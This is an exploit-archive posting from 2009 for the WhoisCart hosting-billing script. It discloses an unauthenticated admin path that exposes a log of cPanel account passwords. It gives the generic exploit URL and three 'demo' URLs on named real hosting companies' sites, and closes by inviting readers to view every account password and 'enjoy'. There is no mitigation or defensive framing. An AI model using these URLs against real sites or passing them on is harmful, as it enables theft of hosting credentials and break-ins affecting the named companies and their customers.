id: 5421
date: 06/28/2009
title: WHOISCART (Auth Bypass) Information Disclosure Vulnerability
author: SecurityRules
cves: 

============================================================
WHOISCART (Auth Bypass) Information Disclosure Vulnerability
============================================================


+===================================================================================+
|                                                                                   |
|                                                                                   |
|                     WHOISCART ADMIN BYPASS                                        |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: Black Dream                                                              |
| Contact: Be5_at_HoTMail_dot_Fr                                                    |
+===================================================================================+
|                                                                                   |
| Script.: WHOISCART                                                                |
| Home...: http://whoiscart.net                                                     |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Exploit:                                                                          |
|                                                                                   |
| http://[website]/[script]/admin/hostinginterfaces/cpanel_1_log.htm                |
|                                                                                   |
| [+] Demo                                                                          |
|                                                                                   |
| http://www.denverwebhost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm   |
|                                                                                   |
| http://www.bearmedia.net/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm       |
|                                                                                   |
| http://thevillagehost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm      |
|                                                                                   |
|                                                                                   |
|                                                                                   |
| [+] Now you see all cpanel[s] accout[pwd] xD   Pure admin                         |
|                                                                                   |
| [+] Enjoy xD                                                                      |             
+-----------------------------------------------------------------------------------|



#  0day.today [2023-03-24]  #